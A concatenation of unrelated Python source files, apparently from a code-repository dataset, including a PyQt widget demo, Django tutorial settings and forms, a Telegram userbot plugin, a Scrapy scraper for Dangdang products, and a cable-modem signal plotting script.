QApplication.setPalette(QApplication.style().standardPalette())
else:
QApplication.setPalette(self.originalPalette)
def advanceProgressBar(self):
curVal = self.progressBar.value()
maxVal = self.progressBar.maximum()
self.progressBar.setValue(curVal + (maxVal - curVal) / 100)
def createTopLeftGroupBox(self):
self.topLeftGroupBox = QGroupBox("Group 1")
radioButton1 = QRadioButton("Radio button 1")
radioButton2 = QRadioButton("Radio button 2")
radioButton3 = QRadioButton("Radio button 3")
radioButton1.setChecked(True)
checkBox = QCheckBox("Tri-state check box")
checkBox.setTristate(True)
checkBox.setCheckState(Qt.PartiallyChecked)
layout = QVBoxLayout()
layout.addWidget(radioButton1)
layout.addWidget(radioButton2)
layout.addWidget(radioButton3)
layout.addWidget(checkBox)
layout.addStretch(1)
self.topLeftGroupBox.setLayout(layout)
def createTopRightGroupBox(self):
self.topRightGroupBox = QGroupBox("Group 2")
defaultPushButton = QPushButton("Default Push Button")
defaultPushButton.setDefault(True)
togglePushButton = QPushButton("Toggle Push Button")
togglePushButton.setCheckable(True)
togglePushButton.setChecked(True)
flatPushButton = QPushButton("Flat Push Button")
flatPushButton.setFlat(True)
layout = QVBoxLayout()
layout.addWidget(defaultPushButton)
layout.addWidget(togglePushButton)
layout.addWidget(flatPushButton)
layout.addStretch(1)
self.topRightGroupBox.setLayout(layout)
def createBottomLeftTabWidget(self):
self.bottomLeftTabWidget = QTabWidget()
self.bottomLeftTabWidget.setSizePolicy(QSizePolicy.Preferred,
QSizePolicy.Ignored)
tab1 = QWidget()
tableWidget = QTableWidget(10, 10)
tab1hbox = QHBoxLayout()
tab1hbox.setContentsMargins(5, 5, 5, 5)
tab1hbox.addWidget(tableWidget)
tab1.setLayout(tab1hbox)
tab2 = QWidget()
textEdit = QTextEdit()
textEdit.setPlainText("Twinkle, twinkle, little star,\n"
"How I wonder what you are.\n"
"Up above the world so high,\n"
"Like a diamond in the sky.\n"
"Twinkle, twinkle, little star,\n"
"How I wonder what you are!\n")
tab2hbox = QHBoxLayout()
tab2hbox.setContentsMargins(5, 5, 5, 5)
tab2hbox.addWidget(textEdit)
tab2.setLayout(tab2hbox)
self.bottomLeftTabWidget.addTab(tab1, "&Table")
self.bottomLeftTabWidget.addTab(tab2, "Text &Edit")
def createBottomRightGroupBox(self):
self.bottomRightGroupBox = QGroupBox("Group 3")
self.bottomRightGroupBox.setCheckable(True)
self.bottomRightGroupBox.setChecked(True)
lineEdit = QLineEdit('s3cRe7')
lineEdit.setEchoMode(QLineEdit.Password)
spinBox = QSpinBox(self.bottomRightGroupBox)
spinBox.setValue(50)
dateTimeEdit = QDateTimeEdit(self.bottomRightGroupBox)
dateTimeEdit.setDateTime(QDateTime.currentDateTime())
slider = QSlider(Qt.Horizontal, self.bottomRightGroupBox)
slider.setValue(40)
scrollBar = QScrollBar(Qt.Horizontal, self.bottomRightGroupBox)
scrollBar.setValue(60)
dial = QDial(self.bottomRightGroupBox)
dial.setValue(30)
dial.setNotchesVisible(True)
layout = QGridLayout()
layout.addWidget(lineEdit, 0, 0, 1, 2)
layout.addWidget(spinBox, 1, 0, 1, 2)
layout.addWidget(dateTimeEdit, 2, 0, 1, 2)
layout.addWidget(slider, 3, 0)
layout.addWidget(scrollBar, 4, 0)
layout.addWidget(dial, 3, 1, 2, 1)
layout.setRowStretch(5, 1)
self.bottomRightGroupBox.setLayout(layout)
def createProgressBar(self):
self.progressBar = QProgressBar()
self.progressBar.setRange(0, 10000)
self.progressBar.setValue(0)
timer = QTimer(self)
timer.timeout.connect(self.advanceProgressBar)
timer.start(1000)
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
gallery = WidgetGallery()
gallery.show()
sys.exit(app.exec_())
| [
"47453834+Heisenberg3562@users.noreply.github.com"
] | 47453834+Heisenberg3562@users.noreply.github.com |
b5410bc80e87082070c7d91330942c2fb097bacb | df1ffbb21b6b67e71730f44a8c019f78903ba176 | /tango_with_django_project/settings.py | e2abe1f16d3330b0138b560e9beb647c552c1f02 | [] | no_license | Hippodoodle/tango_with_django_project | 2f4773aaf3ab98272501c235d8ce859879b94fdd | 84922a826e60a017258b83a69d516634c7b5b866 | refs/heads/master | 2023-02-28T06:47:27.351240 | 2021-02-08T16:44:17 | 2021-02-08T16:44:17 | 330,429,007 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,678 | py | """
Django settings for tango_with_django_project project.
Generated by 'django-admin startproject' using Django 2.2.17.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# The directory containing all the templates used in each app
TEMPLATE_DIR = os.path.join(BASE_DIR, 'templates')
# The directory containing the static files used
STATIC_DIR = os.path.join(BASE_DIR, 'static')
# The directory containging any media files that are used
MEDIA_DIR = os.path.join(BASE_DIR, 'media')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7#^x5i*gzxbvi*fdkxx=0@t93*(=d^7jnma_*ktor@!!r=ntrf'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rango'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tango_with_django_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR, ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.media',
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tango_with_django_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Login
LOGIN_URL = 'rango:login'
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [STATIC_DIR, ]
# Media files
MEDIA_ROOT = MEDIA_DIR
MEDIA_URL = '/media/' | [
"2472525m@student.gla.ac.uk"
] | 2472525m@student.gla.ac.uk |
6a1b6fabba750f53a4bc24f7d310b7c13eb2089c | d23d8841c45299e81b5b96b9fb2a656784aaab5a | /firebot/modules/extra.py | cc83e474fd99423222a2a45192818757b644c538 | [
"MIT"
] | permissive | Lightyagami788/Fire-X-1 | e0d3f78b93685084c0087bca8342c70ac5a95381 | 03ad748a531a31183e5a8ce91575524133925b08 | refs/heads/master | 2023-06-30T15:21:16.459381 | 2021-07-27T05:51:25 | 2021-07-27T05:51:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,610 | py | import asyncio
import time
from collections import deque
from telethon.tl.functions.channels import LeaveChannelRequest
from firebot import CMD_HELP, bot
from firebot.utils import fire_on_cmd
@fire.on(fire_on_cmd("leave$"))
async def leave(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`I iz Leaving dis Lol Group kek!`")
time.sleep(3)
if "-" in str(e.chat_id):
await bot(LeaveChannelRequest(e.chat_id))
else:
await e.edit("`But Boss! This is Not A Chat`")
@fire.on(fire_on_cmd(";__;$"))
# @register(outgoing=True, pattern="^;__;$")
async def fun(e):
t = ";__;"
for j in range(10):
t = t[:-1] + "_;"
await e.edit(t)
@fire.on(fire_on_cmd("yo$"))
# @register(outgoing=True, pattern="^yo$")
async def Ooo(e):
t = "yo"
for j in range(15):
t = t[:-1] + "oo"
await e.edit(t)
@fire.on(fire_on_cmd("Oof$"))
# @register(outgoing=True, pattern="^Oof$")
async def Oof(e):
t = "Oof"
for j in range(15):
t = t[:-1] + "of"
await e.edit(t)
@fire.on(fire_on_cmd("ccry$"))
# @register(outgoing=True, pattern="^.cry$")
async def cry(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("(;´༎ຶД༎ຶ)")
@fire.on(fire_on_cmd("fp$"))
# @register(outgoing=True, pattern="^.fp$")
async def facepalm(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("🤦♂")
@fire.on(fire_on_cmd("moon$"))
# @register(outgoing=True, pattern="^.mmoon$")
async def _(event):
if event.fwd_from:
return
deq = deque(list("🌗🌘🌑🌒🌓🌔🌕🌖"))
for _ in range(32):
await asyncio.sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
@fire.on(fire_on_cmd("source$"))
# @register(outgoing=True, pattern="^.source$")
async def source(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("https://github.com/Chrisdroid1/Fire-X")
@fire.on(fire_on_cmd("readme$"))
# @register(outgoing=True, pattern="^.readme$")
async def reedme(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("https://github.com/Chrisdroid1/Fire-X/blob/master/README.md")
@fire.on(fire_on_cmd("heart$"))
# @register(outgoing=True, pattern="^.heart$")
async def _(event):
if event.fwd_from:
return
deq = deque(list("❤️🧡💛💚💙💜🖤"))
for _ in range(32):
await asyncio.sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
@fire.on(fire_on_cmd("fap$"))
# @register(outgoing=True, pattern="^.fap$")
async def _(event):
if event.fwd_from:
return
deq = deque(list("🍆✊🏻💦"))
for _ in range(32):
await asyncio.sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
CMD_HELP.update({"leave": "Leave a Chat"})
CMD_HELP.update({"cry": "Cry"})
CMD_HELP.update({"fp": "Send face palm emoji."})
CMD_HELP.update({"moon": "Bot will send a cool moon animation."})
CMD_HELP.update({"clock": "Bot will send a cool clock animation."})
CMD_HELP.update({"readme": "Reedme."})
CMD_HELP.update({"source": "Gives the source of your virtualuserbot"})
CMD_HELP.update({"myusernames": "List of Usernames owned by you."})
CMD_HELP.update({"oof": "Same as ;__; but ooof"})
CMD_HELP.update({"earth": "Sends Kensar Earth animation"})
CMD_HELP.update({"heart": "Try and you'll get your emotions back"})
CMD_HELP.update({"fap": "Faking orgasm"})
| [
"noreply@github.com"
] | Lightyagami788.noreply@github.com |
21c6a8090ebd7816df07d48f28e47fc565e4b74f | 23fe5a4b55121d37f31132755c0ed1cf29c7a2cc | /Python/Airdata/airdata/controllers/DataLoader.py | 99d2e9056905ec0e9f677739b65df8bf0c39b7aa | [] | no_license | iPlessmann/Airdata | 9232a7d9721f999cb0ebda5f9065dedc80d2548d | 3fc0331408cd30904fc5f5cba6f22fc97816038f | refs/heads/master | 2020-12-03T23:02:54.934014 | 2016-11-09T18:12:22 | 2016-11-09T18:12:22 | 66,504,788 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,254 | py | import csv
from airdata.datasource.Countries import countries
from airdata.datasource.Airports import airports
from airdata.datasource.Runways import runways
def load():
loadfile("../resources/countries.csv", 0)
print "Loaded %s countries" % len(countries)
loadfile("../resources/airports.csv", 1)
print "Loaded %s airports" % len(airports)
loadfile("../resources/runways.csv", 2)
print "Loaded %s runways" % len(runways)
def loadfile(fileroute, type):
with open(fileroute, 'rb') as csvfile:
has_header = csv.Sniffer().has_header(csvfile.read(1024))
csvfile.seek(0)
spamreader = csv.reader(csvfile)
if has_header:
next(spamreader)
for row in spamreader:
if type == 0:
countries.append(
{'id': int(row[0]), 'code': row[1], 'name': row[2], 'continent': row[3], 'wikipediaLink': row[4],
'keywords': row[5]})
elif type == 1:
airports.append(
{'id': int(row[0]), 'ident': row[1], 'type': row[2], 'name': row[3], 'latitude_deg': row[4],
'longitude_deg': row[5], 'elevation_ft': row[6], 'continent': row[7], 'iso_country': row[8],
'iso_region': row[9],
'municipality': row[10], 'scheduled_service': row[11], 'gps_code': row[12], 'iata_code': row[13],
'local_code': row[14], 'home_link': row[15], 'wikipedia_link': row[16], 'keywords': row[17]})
else:
runways.append(
{'id': int(row[0]), 'airport_ref': int(row[1]), 'airport_ident': row[2], 'length_ft': row[3],
'width_ft': row[4],
'surface': row[5], 'lighted': row[6], 'closed': row[7], 'le_ident': row[8],
'le_latitude_deg': row[9],
'le_longitude_deg': row[10], 'le_elevation_ft': row[11], 'le_heading_degT': row[12],
'le_displaced_threshold_ft': row[13],
'he_ident': row[14], 'he_latitude_deg': row[15], 'he_longitude_deg': row[16],
'he_elevation_ft': row[17], 'he_heading_degT': row[18], 'he_displaced_threshold_ft': row[19]})
| [
"darthplessmann@gmail.com"
] | darthplessmann@gmail.com |
2f64d682aefbbac446f672cd62d06a1f5fc5afaa | 1d1aeb3cee2a691e288b5337800b3f5d0c3ec2b5 | /tango_with_django_project/rango/forms.py | bae8067ef6ddbbc2ad59ebd68b86631b9f01fffc | [] | no_license | MarekReven/tango_with_django | 769ab9324fbd753eea10162123dbcaef38026af3 | fc6adce8ec8cfeffa99732ae1abdeb0a3e194e4d | refs/heads/master | 2020-04-06T07:00:01.455026 | 2016-08-18T18:47:50 | 2016-08-18T18:47:50 | 63,885,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,610 | py | from django import forms
from rango.models import Page, Category, UserProfile
from django.contrib.auth.models import User
class CategoryForm(forms.ModelForm):
name = forms.CharField(max_length=128, help_text='Please enter category name')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
class Meta:
model = Category
fields = ('name',)
class PageForm(forms.ModelForm):
#This part below is only helping in validation, it is not needed and does not create the form
#form is created in class meta
title = forms.CharField(max_length=128, help_text='Please enter title of the page')
url = forms.URLField(max_length=128, help_text='Please enter the URL of the page.')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
class Meta:
model = Page
exclude = ('category',)
def clean(self):
cleaned_data = self.cleaned_data
url = cleaned_data.get('url')
if url and not url.startswith('http://'):
url += 'http://' + url
cleaned_data['url'] = url
else:
pass
return cleaned_data
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput())
class Meta:
model = User
fields = ('username', 'email', 'password')
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ('website', 'picture')
| [
"mrk.lapinski@gmail.com"
] | mrk.lapinski@gmail.com |
75350d8ea32edec380ac4c03af789e83178ccf47 | c3b95f81a69f20c9e2944cbb2a08a9c7e57a86b7 | /commutify/restapis/migrations/0001_initial.py | 108f2edea6a1d05f56663512c1ab2556459c0247 | [] | no_license | rishav394/Commutify-django | 75b0422de4cb1d7d74e35ac83d20dded5c2eefa1 | e9c471fd9c80b771a5c98d8efd8131393c7a9fb2 | refs/heads/main | 2023-03-26T12:34:56.494572 | 2021-03-28T17:29:41 | 2021-03-28T17:29:41 | 347,695,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,400 | py | # Generated by Django 3.1.7 on 2021-03-14 10:33
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Domain',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=10, null=True, unique=True, validators=[django.core.validators.MinLengthValidator(2)])),
('info', models.CharField(max_length=1000, null=True)),
],
options={
'db_table': 'domain',
},
),
migrations.CreateModel(
name='Gender',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.CharField(max_length=20, null=True, unique=True, validators=[django.core.validators.MinLengthValidator(1)])),
],
options={
'db_table': 'gender',
},
),
migrations.CreateModel(
name='Status',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.CharField(max_length=30, null=True, unique=True, validators=[django.core.validators.MinLengthValidator(1)])),
],
options={
'db_table': 'status',
},
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, validators=[django.core.validators.MinLengthValidator(2)])),
('email', models.CharField(max_length=100, null=True, unique=True, validators=[django.core.validators.EmailValidator()])),
('phone', models.CharField(max_length=10, null=True, unique=True, validators=[django.core.validators.MinLengthValidator(6)])),
('password', models.CharField(max_length=100, validators=[django.core.validators.MinLengthValidator(6)])),
('dob', models.DateField(null=True, validators=[django.core.validators.MinLengthValidator(1)])),
('photo', models.CharField(max_length=400, null=True, unique=True)),
('bio', models.CharField(max_length=600, null=True)),
('joined_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('gender', models.ForeignKey(db_column='gender', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='restapis.gender')),
],
options={
'db_table': 'user',
},
),
migrations.CreateModel(
name='UserFriend',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.ForeignKey(db_column='status', on_delete=django.db.models.deletion.DO_NOTHING, to='restapis.status')),
('user1', models.ForeignKey(db_column='user1', on_delete=django.db.models.deletion.DO_NOTHING, related_name='user1', to='restapis.user')),
('user2', models.ForeignKey(db_column='user2', on_delete=django.db.models.deletion.DO_NOTHING, related_name='user2', to='restapis.user')),
],
options={
'db_table': 'user_friend',
},
),
migrations.CreateModel(
name='UserDomains',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('domain', models.ForeignKey(db_column='domain', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='restapis.domain')),
('user', models.ForeignKey(db_column='user', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='restapis.user')),
],
options={
'db_table': 'user_domains',
},
),
]
| [
"rishav.ext@grofers.com"
] | rishav.ext@grofers.com |
1952920a40d28c432150bf5d0286ed71dac0c3a4 | f94d188a77beaa20ece14309af0e0eada54a951d | /atividades/atividade3/problema5.py | f22be687456af384d2a1ee167af2fe0002c6af08 | [] | no_license | gilsontm/ine5416-straights | ffc863a524b2c0adc33fa0aad618723132f1a5f8 | 9b5dd8e792f9d6d94a40a510be4482587b586a5f | refs/heads/master | 2023-01-29T12:11:30.348732 | 2020-12-07T14:10:17 | 2020-12-07T14:10:17 | 245,286,811 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | distance = lambda p1, p2: ((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2 + (p1[2] - p2[2])**2)**(1/2)
print(distance((float(input()), float(input()), float(input())),
(float(input()), float(input()), float(input())))) | [
"gilson.t.magro@gmail.com"
] | gilson.t.magro@gmail.com |
0028e769f48535dbe6482837048edd7a6508f7c6 | e2a5326adbff91c73a18c9f3838fb8130f15d8d4 | /CurrentSensorPython/venv/Scripts/futurize-script.py | 5418b2d2a91c813ebecda9b1b7ff1421ce766f65 | [
"MIT"
] | permissive | IonicRob/CurrentSensor | f68baa6b8a35f965df2cfa8a10d41d84d8893022 | eb2ac041d6d658f953c4cc5c162b3a6284c5072c | refs/heads/main | 2023-04-05T02:17:23.596978 | 2021-04-30T12:44:11 | 2021-04-30T12:44:11 | 350,689,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | #!C:\Users\rober\Documents\CurrentSensorPython\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'future==0.18.2'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| [
"62338052+IonicRob@users.noreply.github.com"
] | 62338052+IonicRob@users.noreply.github.com |
7415bb9a1f738056868a9b8777d22718af7dfdab | d4e83b0853f303b165341c9530d0cdaead494298 | /dangdang/dd/dd/spiders/dd_spider.py | 88967f7690303f3ebc8c7062be9eb2287522cc8d | [] | no_license | tianjinqiujie/scrapy_dd | 3db20e55035fd340f6f8ab8a2b883f2de95faefd | ccb7c8bd20254d7aa39f9e82c84e5c4f7b0a2395 | refs/heads/master | 2020-04-08T16:16:29.790651 | 2018-12-10T14:04:07 | 2018-12-10T14:04:07 | 159,511,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,706 | py | # -*- coding: utf-8 -*-
import scrapy
import requests
import time
from dd.items import DDItem
from bs4 import BeautifulSoup
from scrapy.linkextractors import LinkExtractor
headers = {
"Accept": "text/html,application/xhtml+xm…plication/xml;q=0.9,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en;q=0.3,en-US;q=0.2",
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"Host": "category.dangdang.com",
"Pragma": "no-cache",
"Referer": "http://www.dangdang.com/",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; …) Gecko/20100101 Firefox/63.0"
}
class DdSpiderSpider(scrapy.Spider):
name = 'dd_spider'
allowed_domains = ['dangdang.com']
start_urls = ['http://category.dangdang.com/?ref=www-0-C/']
def parse(self, response):
href = response.css(".classify_books > div > ul > li > a::attr(href)").extract()
for url in href:
yield scrapy.Request(url, headers=headers, callback=self.get_next_page)
def get_next_page(self, response):
pattern = "http://category\.dangdang\.com/pg.*"
le = LinkExtractor(allow=pattern)
try:
links = le.extract_links(response)[-1]
except IndexError as e:
links = le.extract_links(response)
url_pop = response.url.split("/").pop(-1)
msg = {"url_pop": url_pop}
try:
for i in range(1, int(links.text) + 1):
url = "http://category.dangdang.com/pg%s-%s" % (i, url_pop)
yield scrapy.Request(url, meta=msg, callback=self.get_shops_list)
except ValueError as e:
yield scrapy.Request(response.url, meta=msg, callback=self.get_shops_list)
except AttributeError as e:
pass
def get_shops_list(self, response):
msg = response.meta
url = response.css(".bigimg> li > p > a:nth-child(1)::attr(href)").extract()
for i in url:
yield scrapy.Request(i, meta=msg, callback=self.get_shop_info)
def get_total_score(self, response):
print(response.text)
def get_shop_info(self, response):
msg = response.meta.get("url_pop").lstrip("cp").rstrip(".html")
price = response.xpath("//div[@class='price_d']/p[@id='dd-price']").extract_first()
if not price:
price = response.xpath("//div[@class='cost_box']/p[1]/span[@class='normal_price']/i/text()").extract_first()
price_soup = BeautifulSoup(price, "html")
if not price_soup:
return
########################################### 获取所需数据 ###########################################
# 价格
goods_price = price_soup.text.strip('\n').strip("\r").strip(" ").lstrip("¥")
try:
goods_price = float(goods_price)
except ValueError as e:
goods_price = float(goods_price.split("-")[0])
# 名称
goods_name = response.xpath("/html/body/div[2]/div[3]/div[2]/div/div[1]/div[1]/h1/@title").extract_first()
if not goods_name:
goods_name = str(response.css(".name_info > h1:nth-child(1)").extract_first())
goods_name_soup = BeautifulSoup(goods_name)
goods_name = goods_name_soup.text.replace("\r","").strip(" ").replace("\n","").strip(" ").replace(" ","")
# 商品链接
goods_detail_url = response.url
# 图片链接
goods_image = response.css("#main-img-slider > li > a > img::attr(src)").extract_first()
# 商品ID
goods_product_id = int(response.url.split("/")[-1].split(".")[-2])
# 商品分类名称
goods_cate_name = response.css("a.green:nth-child(1)::text").extract_first()
# 评论数/销量
goods_comment_num = response.css("#comm_num_down::text").extract_first()
# 商铺名称
shop_name = response.css(".title_name > span:nth-child(2) > a:nth-child(1)::text").extract_first()
if not shop_name:
shop_name = "当当自营"
# 评分
url = 'http://product.dangdang.com/index.php?r=comment%2Flist&productId={}&categoryPath={}' \
'&mainProductId={}&mediumId=0&pageIndex=1&sortType=1&filterType=1&isSystem=1&tagId=0&' \
'tagFilterCount=0'.format(goods_product_id, msg, goods_product_id)
time.sleep(0.1)
# ret = scrapy.Request(url,callback=self.get_total_score)
s = requests.Session()
goods_total_score = float(s.get(url).json().get('data').get("list").get('summary').get('goodRate')) / 20
dd = DDItem()
info = {
"goods_price": goods_price,
"goods_name": goods_name,
"goods_detail_url": goods_detail_url,
"goods_image": goods_image,
"goods_product_id": goods_product_id,
"goods_cate_name": goods_cate_name,
"goods_comment_num": goods_comment_num,
"goods_sale_num": goods_comment_num,
"shop_name": shop_name,
"goods_total_score": goods_total_score,
"platform": 9
}
dd["goods_price"] = goods_price
dd["goods_name"] = goods_name
dd["goods_detail_url"] = goods_detail_url
dd["goods_image"] = goods_image
dd["goods_product_id"] = goods_product_id
dd["goods_cate_name"] = goods_cate_name
dd["goods_comment_num"] = goods_comment_num
dd["goods_sale_num"] = goods_comment_num
dd["shop_name"] = shop_name
dd["goods_total_score"] = goods_total_score
dd["platform"] = 9
yield dd
# print("----->", info)
| [
"qiujie2010@qq.com"
] | qiujie2010@qq.com |
24ed6d4aae7221b002cc5c5d50b2cdd9637d1ed9 | f9a4decff92a56b5296ac88e249c611d1d4102c7 | /dogler_plot3.py | f39ccef6669029ab504fb8fcbbfdc3a18b806271 | [] | no_license | edmonds/dogler | 1ef8d3a1a3f44c814289c357ce7950075b8628e9 | ac2fbb9d6c664e170a173bc79cc9c71a254da420 | refs/heads/master | 2021-08-30T03:54:24.032899 | 2017-12-15T23:27:26 | 2017-12-15T23:27:26 | 114,419,192 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,464 | py | #!/usr/bin/env python
from collections import OrderedDict
import datetime
import json
import math
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.ticker import MultipleLocator
def main(fnames):
timestamps = []
dsData = OrderedDict()
ds31Data = OrderedDict()
usData = OrderedDict()
minDsPower = 10000.0
maxDsPower = -10000.0
minDs31Power = 10000.0
maxDs31Power = -10000.0
minDsSNR = 10000.0
maxDsSNR = -10000.0
minDs31SNR = 10000.0
maxDs31SNR = -10000.0
minUsPower = 10000.0
maxUsPower = -10000.0
for fname in fnames:
for line in open(fname):
j = json.loads(line)
unixTime = int(j['unixTime'])
timestamp = datetime.datetime.fromtimestamp(unixTime)
timestamps.append(timestamp)
for ds in j['dsTable']:
ch = ds['Channel ID']
if ch != '0':
if not ch in dsData:
dsData[ch] = { 'power': [], 'snr': [] }
power = float(ds['Power'].partition(' ')[0])
snr = float(ds['SNR / MER'].partition(' ')[0])
num_missing = 0
if len(dsData[ch]['power']) != len(timestamps)-1:
num_missing = (len(timestamps)-1) - len(dsData[ch]['power'])
dsData[ch]['power'].extend([0] * num_missing)
if len(dsData[ch]['snr']) != len(timestamps)-1:
num_missing = (len(timestamps)-1) - len(dsData[ch]['snr'])
dsData[ch]['snr'].extend([0] * num_missing)
dsData[ch]['power'].append(power)
dsData[ch]['snr'].append(snr)
if num_missing != 0:
continue
minDsPower = min(minDsPower, power)
maxDsPower = max(maxDsPower, power)
minDsSNR = min(minDsSNR, snr)
maxDsSNR = max(maxDsSNR, snr)
for ds in j['d31dsTable']:
ch = ds['Channel ID']
if ch != '0':
if not ch in ds31Data:
ds31Data[ch] = { 'power': [], 'snr': [] }
power = float(ds['Power'].partition(' ')[0])
snr = float(ds['SNR / MER'].partition(' ')[0])
num_missing = 0
if len(ds31Data[ch]['power']) != len(timestamps)-1:
num_missing = (len(timestamps)-1) - len(ds31Data[ch]['power'])
ds31Data[ch]['power'].extend([0] * num_missing)
if len(ds31Data[ch]['snr']) != len(timestamps)-1:
num_missing = (len(timestamps)-1) - len(ds31Data[ch]['snr'])
ds31Data[ch]['snr'].extend([0] * num_missing)
ds31Data[ch]['power'].append(power)
ds31Data[ch]['snr'].append(snr)
if num_missing != 0:
continue
minDs31Power = min(minDs31Power, power)
maxDs31Power = max(maxDs31Power, power)
minDs31SNR = min(minDs31SNR, snr)
maxDs31SNR = max(maxDs31SNR, snr)
for us in j['usTable']:
ch = us['Channel ID']
if ch != '0':
if not ch in usData:
usData[ch] = { 'power': [] }
power = float(us['Power'].partition(' ')[0])
if len(usData[ch]['power']) != len(timestamps)-1:
num_missing = (len(timestamps)-1) - len(usData[ch]['power'])
usData[ch]['power'].extend([0] * num_missing)
usData[ch]['power'].append(power)
